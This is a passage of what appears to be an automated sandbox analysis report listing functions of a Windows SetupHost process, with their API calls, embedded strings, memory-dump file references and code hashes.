                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalHeapSection$EnterFreeLeaveProcessReleaseSemaphore
                                                                                                                        • String ID: DequeueWimData
                                                                                                                        • API String ID: 3013838341-1001850157
                                                                                                                        • Opcode ID: 5b6043bf275f4e4ca3fa491da92ced6330fd4e46c2298b138381f368bbcbfda5
                                                                                                                        • Instruction ID: 521dbae0a61a262cfb357fd2c20b10044c8eec87781bb45fe3d2922593375aa2
                                                                                                                        • Opcode Fuzzy Hash: 5b6043bf275f4e4ca3fa491da92ced6330fd4e46c2298b138381f368bbcbfda5
                                                                                                                        • Instruction Fuzzy Hash: BF119D35600329ABCB10DFA5EC88B8ABFA8FF69711F008425B904D72E0D770DD00DBA0
                                                                                                                        Function 0051C2AE Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?,00000000,00000000,?,?,?,00000000,?), ref: 0051C368
                                                                                                                        Strings
                                                                                                                        • RtlAppendLBlobToLBlob, xrefs: 0051C2DF
                                                                                                                        • ::RtlIsLBlobValid(Destination), xrefs: 0051C304
                                                                                                                        • ::RtlIsLBlobValid(Source), xrefs: 0051C333
                                                                                                                        • Not-null check failed: Destination, xrefs: 0051C2C8
                                                                                                                        • Not-null check failed: Source, xrefs: 0051C318
                                                                                                                        • onecore\base\lstring\lblob.cpp, xrefs: 0051C2D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memcpy
                                                                                                                        • String ID: ::RtlIsLBlobValid(Destination)$::RtlIsLBlobValid(Source)$Not-null check failed: Destination$Not-null check failed: Source$RtlAppendLBlobToLBlob$onecore\base\lstring\lblob.cpp
                                                                                                                        • API String ID: 3510742995-2103971228
                                                                                                                        • Opcode ID: 87609780f36d28501a97a23a1652cf4b33cda7cf6288412d82d2f6d1303f0ca4
                                                                                                                        • Instruction ID: cbc0fd9198fb1bff10853696fe62ce2d2c60d6dc493e875b2fc655635a27d716
                                                                                                                        • Opcode Fuzzy Hash: 87609780f36d28501a97a23a1652cf4b33cda7cf6288412d82d2f6d1303f0ca4
                                                                                                                        • Instruction Fuzzy Hash: 8721AEB5A41209ABEF10EFC4C4489DEBFB5BF81308F25889AD8616B301D7758E849B95
                                                                                                                        Function 00547050 Relevance: 10.1, APIs: 8, Instructions: 136memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 005470A4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005470B9
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 005470C0
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 005470D5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005470E2
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005470E9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005471BD
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005471C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ByteCharFreeMultiWide$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 741470664-0
                                                                                                                        • Opcode ID: 1147b48c888d5b42c260aef13c6df872d0505a4bf99a97f21e9c6728c840262e
                                                                                                                        • Instruction ID: 2f70a299602ed064a3281e8d8c20ed4c4cf402ee56d4949720b4f5a324bf991f
                                                                                                                        • Opcode Fuzzy Hash: 1147b48c888d5b42c260aef13c6df872d0505a4bf99a97f21e9c6728c840262e
                                                                                                                        • Instruction Fuzzy Hash: 2D41817590421A9FDB10DFA4DC48BAFBBB9FF48316F144165E815E7290EB709D44CB60
                                                                                                                        Function 0053B053 Relevance: 10.1, APIs: 8, Instructions: 128COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2221118986-0
                                                                                                                        • Opcode ID: f5b6bf27eef4e303001baf7e9c274eedf36e6142ac1ebd5e8cc7fdb2670a1080
                                                                                                                        • Instruction ID: b4f5244b02f1aaa9296fb2ce75fa70d1c065e7852fa2558bc3e437c0c372a4a5
                                                                                                                        • Opcode Fuzzy Hash: f5b6bf27eef4e303001baf7e9c274eedf36e6142ac1ebd5e8cc7fdb2670a1080
                                                                                                                        • Instruction Fuzzy Hash: BE4184F2941B049EE324DE74C999FE7BBDCFB84310F40093EE65A5A182E774A944CA14
                                                                                                                        Function 00527104 Relevance: 10.1, APIs: 8, Instructions: 72memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527138
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 0052713F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527168
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 0052716F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527190
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 00527197
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 005271A8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0051E0F4,?,00000000,00000000,0051E358,?,?,00000000), ref: 005271AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 3abf48e058deebf74e1af31f88751fdef87475108f13650a0219b687f02510a7
                                                                                                                        • Instruction ID: a050290fd69e0080f443a45c9ae594c46704cd25d5f36f4098432a789a83f9e4
                                                                                                                        • Opcode Fuzzy Hash: 3abf48e058deebf74e1af31f88751fdef87475108f13650a0219b687f02510a7
                                                                                                                        • Instruction Fuzzy Hash: 75218E71608329BBEB20DFA5EC58B2A7BACFF19752F10409CE80AD61D1D730D910CB20
                                                                                                                        Function 0052E3CE Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 137memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000030,00000002,?,00000000,00000000,?,?,000000FF,00000000,00000000,00000001), ref: 0052E463
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0052E46A
                                                                                                                        • memcpy.MSVCRT(0000002A,?,?), ref: 0052E4E0
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0052E532
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052E539
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFreememcpy
                                                                                                                        • String ID: FltCommStubCreateChild
                                                                                                                        • API String ID: 3405790324-3059287848
                                                                                                                        • Opcode ID: eba345b42747bfa7e6fab0399ae7a048e2813f482cf425cb8f0de0252dc1d2d0
                                                                                                                        • Instruction ID: 7e135b896fa5781f58b9d591bcf93629b751cb39a134f11516e9c4f88de45cbb
                                                                                                                        • Opcode Fuzzy Hash: eba345b42747bfa7e6fab0399ae7a048e2813f482cf425cb8f0de0252dc1d2d0
                                                                                                                        • Instruction Fuzzy Hash: C0419675A00226AFCB10DF69D859A6BBFF4FF49310F10452AE919D7390E734A900CBD1
                                                                                                                        Function 0053F038 Relevance: 9.1, APIs: 6, Instructions: 112filethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0053F09D
                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,00000000,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F0BA
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0C1
                                                                                                                        • GetFileSize.KERNEL32(00000000,?,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?,?,?), ref: 0053F0E1
                                                                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,?,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C), ref: 0053F0F8
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000002,00000100,00000000,005525D0,00000030,0053F27C,?), ref: 0053F10B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentFile$Process$CreateMappingSizeThreadView
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521580201-0
                                                                                                                        • Opcode ID: 8db13c22c8f7e4d4f5ee8a16a7ad5ae0a70990cfb262c76e3c6dc3f8e81f8c87
                                                                                                                        • Instruction ID: e14491910ac1bf325f5e8443b46ea57c70c919d5ecdc5db941c76b61ad469afa
                                                                                                                        • Opcode Fuzzy Hash: 8db13c22c8f7e4d4f5ee8a16a7ad5ae0a70990cfb262c76e3c6dc3f8e81f8c87
                                                                                                                        • Instruction Fuzzy Hash: 4F4129B1E01219EFDB148FA8EC95AAEBBB8FB48755F104229E811E7290D7305D01CB20
                                                                                                                        Function 00525340 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsicmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2081463915-0
                                                                                                                        • Opcode ID: 95601c1f6284cfeaecaeab769ff11eec2cf46f558be2e17fa66e2cbd86a28697
                                                                                                                        • Instruction ID: e8a8ed3ea32b7d75906fa5dafc7546d380b5d3c8cef58f408e520622281bab6b
                                                                                                                        • Opcode Fuzzy Hash: 95601c1f6284cfeaecaeab769ff11eec2cf46f558be2e17fa66e2cbd86a28697
                                                                                                                        • Instruction Fuzzy Hash: 79310432204625EBDF15AF19F854A6EBFA4FF66762F248015FA05CA1E1FB70CC409B90
                                                                                                                        Function 00510129 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 52memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000000C,?,?,?,?,0050FEA4,?,?), ref: 00510137
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,0050FEA4,?,?), ref: 0051013E
                                                                                                                        Strings
                                                                                                                        • onecore\internal\base\inc\rtl_object_library.h, xrefs: 00510168
                                                                                                                        • Windows::Rtl::CRtlObjectTypeDescription<class MicrodomWriterImplementation::CMicrodomWriter>::CreateTearoff, xrefs: 00510173
                                                                                                                        • L;M, xrefs: 00510170
                                                                                                                        • NewTearoff.Allocate(), xrefs: 00510181
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID: L;M$NewTearoff.Allocate()$Windows::Rtl::CRtlObjectTypeDescription<class MicrodomWriterImplementation::CMicrodomWriter>::CreateTearoff$onecore\internal\base\inc\rtl_object_library.h
                                                                                                                        • API String ID: 1617791916-976882397
                                                                                                                        • Opcode ID: b0b7a7e37567a39a50380782d41caf1b6cf382bd1fd20b8d6ef5cd59ac5c7a6b
                                                                                                                        • Instruction ID: 8db1aeaef5819675f6ab324597a12263850b187d20240cee065f970a6f92d867
                                                                                                                        • Opcode Fuzzy Hash: b0b7a7e37567a39a50380782d41caf1b6cf382bd1fd20b8d6ef5cd59ac5c7a6b
                                                                                                                        • Instruction Fuzzy Hash: 3511C275600304ABEB009F98DC98BAEBFB4BF95316F04845AD8055B391C7F89984CB94
                                                                                                                        Function 004FE2CF Relevance: 9.1, APIs: 6, Instructions: 51memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,0050076D,?,00000000,00000000,00000000,0051E497,?,00000000), ref: 004FE33D
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,0050076D,?,00000000,00000000,00000000,0051E497,?,00000000), ref: 004FE2F1
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FE305
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FE321
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FE328
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 004FE32F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 686246089-0
                                                                                                                        • Opcode ID: fea272c528ba6b5fa1f354045707fa5bc205d1fb25d000e5283f0cf47572870f
                                                                                                                        • Instruction ID: 8fbbfa9f740f9d4eac0f6a0cd36dc1ee77a8bda95947c447aad29262a1def954
                                                                                                                        • Opcode Fuzzy Hash: fea272c528ba6b5fa1f354045707fa5bc205d1fb25d000e5283f0cf47572870f
                                                                                                                        • Instruction Fuzzy Hash: FB01F933A083295BE7301B7B7C5CABB2605AB98773F150526FF55C31B0C7288C479599
                                                                                                                        Function 0052B352 Relevance: 9.0, APIs: 6, Instructions: 40fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,0051E584,?,00000000), ref: 0052B369
                                                                                                                        • CreateFileW.KERNEL32(00000000,00010000,00000007,00000000,00000003,06200000,00000000,?,?,0051E584,?,00000000), ref: 0052B380
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,0051E584,?,00000000), ref: 0052B38C
                                                                                                                        • GetLastError.KERNEL32(?,?,0051E584,?,00000000), ref: 0052B398
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,0051E584,?,00000000), ref: 0052B3A3
                                                                                                                        • SetLastError.KERNEL32(00000057,?,?,0051E584,?,00000000), ref: 0052B3AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$File$AttributesCloseCreateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3033830061-0
                                                                                                                        • Opcode ID: ebbea5ea6e8073af3642316f189bc1fd91fc7a1a317782bc7ac64143d49c794e
                                                                                                                        • Instruction ID: 4b8aca2b14856589f4cccc72db342cac87505b6e4ea290698f03a0e3bd4c8b49
                                                                                                                        • Opcode Fuzzy Hash: ebbea5ea6e8073af3642316f189bc1fd91fc7a1a317782bc7ac64143d49c794e
                                                                                                                        • Instruction Fuzzy Hash: 9DF0B471648724A7E7315774BC1CF6B2F28BFAAF72F260E00F914E61D0CB60C845A6A0
                                                                                                                        Function 00515190 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 192COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • NewAttdef = this->AllocateStreamObject(), xrefs: 005151D4
                                                                                                                        • CMicrodomBuilder::ConsumeAttdef, xrefs: 005151DF
                                                                                                                        • m_AttdefListTable.FindOrInsertIfNotPresent( ulElementName, NewAttdefList, &pAttdefList), xrefs: 0051537F
                                                                                                                        • onecore\base\xml\udom_builder.cpp, xrefs: 005151E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aullrem
                                                                                                                        • String ID: CMicrodomBuilder::ConsumeAttdef$NewAttdef = this->AllocateStreamObject()$m_AttdefListTable.FindOrInsertIfNotPresent( ulElementName, NewAttdefList, &pAttdefList)$onecore\base\xml\udom_builder.cpp
                                                                                                                        • API String ID: 3758378126-1433591952
                                                                                                                        • Opcode ID: 4f163361f738bdacb82d20ff209669601ee2c4dc34ae419980565ac93bb45a52
                                                                                                                        • Instruction ID: 5d2dc50f99766fc23a670aaf2fdfa02d78ed80c86ceefbcabb66bc053f2c7646
                                                                                                                        • Opcode Fuzzy Hash: 4f163361f738bdacb82d20ff209669601ee2c4dc34ae419980565ac93bb45a52
                                                                                                                        • Instruction Fuzzy Hash: 2A717BB5900A1AEFE714CF65C8449EABFF4FF84304F20892AD5269B640E775E985CF90
                                                                                                                        Function 004E8049 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 004E80AE
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004E8168
                                                                                                                        • GetLastError.KERNEL32 ref: 004E8172
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        • CSystemHelper::CreateTrayIcon, xrefs: 004E8080
                                                                                                                        • SetupUI: Creating tray icon..., xrefs: 004E8140
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorH_prolog3IconLastNotifyShell_memset
                                                                                                                        • String ID: CSystemHelper::CreateTrayIcon$SetupUI: Creating tray icon...
                                                                                                                        • API String ID: 1564345637-1340830530
                                                                                                                        • Opcode ID: 16067e389bf89969c1d8e9067dd1cf8eea88684769b4e3ce07512bd0cb881a52
                                                                                                                        • Instruction ID: 43515609cceb75d488aa5b6c92d132ecff236631e6cd0905377a4393badf0c04
                                                                                                                        • Opcode Fuzzy Hash: 16067e389bf89969c1d8e9067dd1cf8eea88684769b4e3ce07512bd0cb881a52
                                                                                                                        • Instruction Fuzzy Hash: FF31F371B002148BDF119F65CC59B6AB7B9AF84315F0540AEE909AB381CB789E058F84
                                                                                                                        Function 004E82D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
